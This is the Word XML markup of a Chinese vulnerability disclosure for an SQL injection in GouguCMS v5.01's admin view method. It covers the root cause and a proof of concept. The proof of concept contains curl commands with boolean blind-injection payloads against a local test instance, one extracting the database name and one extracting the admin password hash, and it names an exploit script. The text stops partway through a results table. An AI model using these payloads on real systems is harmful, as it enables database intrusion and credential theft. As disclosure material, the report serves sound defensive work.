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808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>勾股</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">CMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>后台管理用户查看功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CNVD-GOUGU-2026-001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>厂商</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>勾股工作室</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>产品</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>勾股</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t xml:space="preserve">CMS v5.01 | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>: SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>注入（代码注入）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>厂商：</w:t>
      </w:r>
      <w:r>
        <w:t>勾股工作室</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>产品：</w:t>
      </w:r>
      <w:r>
        <w:t>勾股</w:t>
      </w:r>
      <w:r>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>GouguCMS</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>v5.01</w:t>
      </w:r>
      <w:r>
        <w:t>（全版本受影响）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞类型：</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入（代码注入）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>影响组件：</w:t>
      </w:r>
      <w:r>
        <w:t>/app/admin/controller/Admin.php view</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>勾股</w:t>
      </w:r>
      <w:r>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:t>是一套基于</w:t>
      </w:r>
      <w:r>
        <w:t>ThinkPHP8 + Layui + MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>打造的轻量级、高性能开源内容管理系统（</w:t>
      </w:r>
      <w:r>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:t>），面向中小企业提供快速建站、后台权限管理等基础功能，其源码托管于</w:t>
      </w:r>
      <w:r>
        <w:t>Gitee</w:t>
      </w:r>
      <w:r>
        <w:t>平台（</w:t>
      </w:r>
      <w:r>
        <w:t>https://gitee.com/gougucms/gougucms</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>在系统后台管理模块中，管理员信息查看功能（</w:t>
      </w:r>
      <w:r>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:t>控制器的</w:t>
      </w:r>
      <w:r>
        <w:t>view</w:t>
      </w:r>
      <w:r>
        <w:t>方法）在处理用户传入的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>参数时，未进行任何安全过滤，直接将用户可控的参数值通过</w:t>
      </w:r>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t>字符串插值语法拼接到</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>查询的</w:t>
      </w:r>
      <w:r>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>子句中，导致</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>访问正常的管理</w:t>
      </w:r>
      <w:r>
        <w:t>员信息查看页面（</w:t>
      </w:r>
      <w:r>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:t>），页面正常展示管理员信息：</w:t>
      </w:r>
    </w:p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59261" name="正常id=1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常id=1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当</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>参数中包含单引号字符时（</w:t>
      </w:r>
      <w:r>
        <w:t>id=1'</w:t>
      </w:r>
      <w:r>
        <w:t>），触发</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语法错误，系统返回</w:t>
      </w:r>
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:t>错误页面，证实了</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入的存在：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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88563" name="SQL语法错误500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语法错误500页面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利用布尔盲注技术，可通过比较不同</w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t>返回的页面大小差异，逐字节提取数据库中任意数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞代码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /app/admin/controller/Admin.php </w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>207-213</w:t>
      </w:r>
      <w:r>
        <w:t>行：</w:t>
      </w:r>
    </w:p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1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69778" name="漏洞代码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漏洞代码位置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核心问题分析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- get_params('id') </w:t>
      </w:r>
      <w:r>
        <w:t>函数（定义在</w:t>
      </w:r>
      <w:r>
        <w:t>/app/common.php</w:t>
      </w:r>
      <w:r>
        <w:t>）直接调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Request::</w:t>
      </w:r>
      <w:r>
        <w:t>instance()-&gt;param($key)</w:t>
      </w:r>
      <w:r>
        <w:t>，返回原始用户输入，未经过任何</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>安全过滤；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>双引号字符串中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {$id} </w:t>
      </w:r>
      <w:r>
        <w:t>语法会将变量值直接展开到</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语句中；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>ThinkPHP</w:t>
      </w:r>
      <w:r>
        <w:t>框架的</w:t>
      </w:r>
      <w:r>
        <w:t>QueryBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>在其他地方使用参数绑定（如数组形式的</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>条件），此处错误地使用了原始字符串拼接；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>开发者未意识到在</w:t>
      </w:r>
      <w:r>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>子句中使用字符串插值同样会导致</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>相同模式的其他位置：该</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入编码模式在全项目中共出现</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>次（均为同一开发者编写），另一处位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /app/admin/middl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eware/Auth.php </w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>72</w:t>
      </w:r>
      <w:r>
        <w:t>行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>概念验证（</w:t>
      </w:r>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>验证环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>http://127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>管理员账号：</w:t>
      </w:r>
      <w:r>
        <w:t>admin / admin123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>测试工具：</w:t>
      </w:r>
      <w:r>
        <w:t>curl + Python PoC</w:t>
      </w:r>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>：登录获取</w:t>
      </w:r>
      <w:r>
        <w:t>Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>访问后台登录页面，使用管理员凭据登录获取</w:t>
      </w:r>
      <w:r>
        <w:t>Session Cookie</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p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3810000" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90530" name="后台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后台登录页面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pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl -c cookie.txt -X POST http://127.0.0.1:8080/admin/login/login_submit \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  -d "username=admin&amp;password=admin123"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>：布尔盲注验证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>正常请求（</w:t>
      </w:r>
      <w:r>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s -b cookie.txt "http://127.0.0.1:8080/admin/admin/view?id=1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP 200</w:t>
      </w:r>
      <w:r>
        <w:t>，页面大小</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 30,835 </w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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3810000" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14479" name="正常id=1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常id=1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True</w:t>
      </w:r>
      <w:r>
        <w:t>条件注入（</w:t>
      </w:r>
      <w:r>
        <w:t>id=1' AND '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s -b cookie.txt "http://127.0.0.1:8080/admin/admin/view?id</w:t>
      </w:r>
      <w:r>
        <w:t>=1'+AND+'1'='1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP 200</w:t>
      </w:r>
      <w:r>
        <w:t>，页面大小</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 30,835 </w:t>
      </w:r>
      <w:r>
        <w:t>字节（与正常页面相同，条件为真）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/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12578" name="True条件注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e条件注入结果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False</w:t>
      </w:r>
      <w:r>
        <w:t>条件注入（</w:t>
      </w:r>
      <w:r>
        <w:t>id=1' AND '1'='2</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s -b cookie.txt "http://127.0.0.1:8080/admin/admin/view?id=1'+AND+'1'='2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP 200</w:t>
      </w:r>
      <w:r>
        <w:t>，页面大小</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 30,044 </w:t>
      </w:r>
      <w:r>
        <w:t>字节（比正常小</w:t>
      </w:r>
      <w:r>
        <w:t>791</w:t>
      </w:r>
      <w:r>
        <w:t>字节，条件为假）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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70385" name="False条件注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se条件注入结果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语法错误验证（</w:t>
      </w:r>
      <w:r>
        <w:t>id=1'</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s -b cookie.txt "http://127.0.0.1:8080/admin/admin/view?id=1'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP 500</w:t>
      </w:r>
      <w:r>
        <w:t>，触发</w:t>
      </w:r>
      <w:r>
        <w:t>ThinkPHP</w:t>
      </w:r>
      <w:r>
        <w:t>错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/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572000" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86324" name="SQL语法错误500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语法错误500页面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pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>：数据提取（布尔盲注）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>提取数据库名首字符示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>判断</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DATABASE() </w:t>
      </w:r>
      <w:r>
        <w:t>第一个字符的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>码是否大于</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s -b cookie.txt \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "http://127.0.0.1:8080/admin/admin/view?id=1'+AND+ASCII(SUBSTRING</w:t>
      </w:r>
      <w:r>
        <w:t>(DATABASE(),1,1))&gt;100--+-"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>通过页面大小判断真</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>假条件，二分法逐字符提取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:t>脚本：完整的自动化利用脚本见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ./poc/exploit.py</w:t>
      </w:r>
      <w:r>
        <w:t>，使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>python3 exploit.py --url http://127.0.0.1:8080 --user admin --pass admin123 --extract database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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4570684" cy="1744910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82778" name="PoC脚本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脚本运行结果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229" cy="176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ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>构造示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /admin/admin/view?id=1'+AND+(SELECT+SUBSTRING(p</w:t>
      </w:r>
      <w:r>
        <w:t>wd,1,16)+FROM+cms_admin+LIMIT+1)='hash_prefix'+--+-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="008B2808"/>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>验证结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>在本地搭建的</w:t>
      </w:r>
      <w:r>
        <w:t>GouguCMS v5.01</w:t>
      </w:r>
      <w:r>
        <w:t>测试环境中，使用</w:t>
      </w:r>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t>工具对漏洞进行了完整验证。布尔盲注验证结果如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="1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261"/>
        <w:gridCol w:w="2262"/>
        <w:gridCol w:w="2262"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B2808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F5496"/>
          </w:tcPr>
          <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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HTTP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>状态码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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响应大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w:rsidR="008B2808" w:rsidRDefault="00B3511B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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B2808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id=1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 xml:space="preserve">30,835 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>字节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正常查询，返回管理员信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B2808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id=1' AND '1'='1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 xml:space="preserve">30,835 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>字节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True</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>条件，与正常相同</w:t>
            </w:r>
          </w:p>
        </w:tc>
